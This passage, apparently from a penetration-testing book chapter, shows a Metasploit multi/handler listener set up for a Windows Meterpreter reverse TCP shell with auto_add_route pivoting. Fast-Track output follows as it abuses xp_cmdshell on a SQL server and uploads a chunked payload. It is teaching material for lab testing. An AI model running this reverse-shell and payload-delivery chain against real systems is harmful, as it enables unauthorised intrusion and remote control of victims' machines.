background image

256

Chapter 17

Before launching the attack, we need to set up some options through 

msfconsole

. For practice, let’s create our own Metasploit listener manually. 

Fast-Track can set it up for you, but we will be adding the 

load

 

auto_add_route

   

function within Metasploit so that we can automatically connect to systems 
on the internal network. We’ll create a listener and launch Fast-Track to attack 
the system.

root@bt:/opt/framework3/msf3# 

msfconsole

msf > 

use multi/handler

msf exploit(handler) > 

set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > 

set LHOST 172.16.32.129

LHOST => 172.16.32.129
smsf exploit(handler) > 

set LPORT 443

LPORT => 443

exploit(handler) > 

load auto_add_route

[*] Successfully loaded plugin: auto_add_route
msf exploit(handler) > 

exploit -j

[*] Exploit running as background job.
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
msf exploit(handler) >

With our listener waiting for a connection from our soon-to-be compro-

mised target, we launch Fast-Track. (When the 

xterm

 window opens, close it 

since we already have a listener set up.)

[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+]
[+] Delivery Complete. [+]
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=172.16.32.129,LPORT=443
Taking raw binary and converting to hex.
Raw binary converted to straight hex.
[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]
[+] Sending chunked payload. Number 1 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]

. . . SNIP . . .

[+] Conversion from hex to binary in progress. [+]
[+] Conversion complete. Moving the binary to an executable. [+]
[+] Splitting the hex into 100 character chunks [+]
[+] Split complete. [+]